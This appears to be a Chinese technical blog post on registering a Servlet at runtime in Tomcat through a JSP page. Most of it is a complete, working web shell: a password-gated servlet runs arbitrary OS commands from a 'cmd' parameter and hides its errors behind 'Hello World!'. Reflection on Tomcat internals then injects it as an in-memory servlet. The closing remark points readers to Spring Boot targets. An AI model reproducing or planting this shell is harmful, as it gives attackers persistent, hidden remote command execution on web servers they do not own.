利用JSP动态注册Servlet

木芒果呀

已于 2023-04-16 12:27:08 修改

阅读量348

点赞数

文章标签： java tomcat Powered by 金山文档

于 2023-03-19 12:49:46 首次发布

本文链接：https://blog.csdn.net/m0_63823719/article/details/129649320

版权

引入对应版本的tomcat-catalina包

<dependency>
     <groupId>org.apache.tomcat</groupId>
      <artifactId>tomcat-catalina</artifactId>
      <version>10.1.6</version>
</dependency>

新建一个JSP页面并写入以下内容

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
  <title>首页</title>
</head>
<body>
<%!
  //RCE Servlet
  //http://localhost:8080/MyServlet?pwd=123456&cmd=whoami
  public class MyServlet extends HttpServlet {
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws java.io.IOException {
      java.io.PrintWriter out = response.getWriter();
      try {
        if ("123456".equals(request.getParameter("pwd"))) {
          response.setContentType("text/html;charset=UTF-8");
          response.setCharacterEncoding("UTF-8");
          java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
          int a = -1;
          byte[] b = new byte[2048];
          out.print("<pre>");
          while ((a = in.read(b)) != -1) {
            out.println(new String(b));
          }
          out.print("</pre>");
        }
      } catch (Exception e) {
        out.print("Hello World!");
      }
    }
  }
%>

<%
  try {
    //动态注册Servlet
    ServletContext servletContext = request.getServletContext();
    java.lang.reflect.Field appcationContextField = servletContext.getClass().getDeclaredField("context");
    appcationContextField.setAccessible(true);
    org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) appcationContextField.get(servletContext);

    java.lang.reflect.Field standardContextField = applicationContext.getClass().getDeclaredField("context");
    standardContextField.setAccessible(true);
    org.apache.catalina.core.StandardContext standardContext = (org.apache.catalina.core.StandardContext) standardContextField.get(applicationContext);

    //注册进Servlet
    org.apache.catalina.Wrapper wrapper = standardContext.createWrapper();
    wrapper.setServletClass(MyServlet.class.getName());
    wrapper.setName("MyServlet");
    wrapper.setServlet(new MyServlet());

    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/MyServlet", "MyServlet");
  } catch (Exception e) {
    out.print("Hello World!");
  }
%>
</body>
</html>

3.有些人看到这就要开始想了，不是这还要引入个依赖，我怎么利用，在SpringBoot项目中由于它使用的内嵌式的Tomcat所以它默认引入了Tomcat的所有核心依赖，不用担心！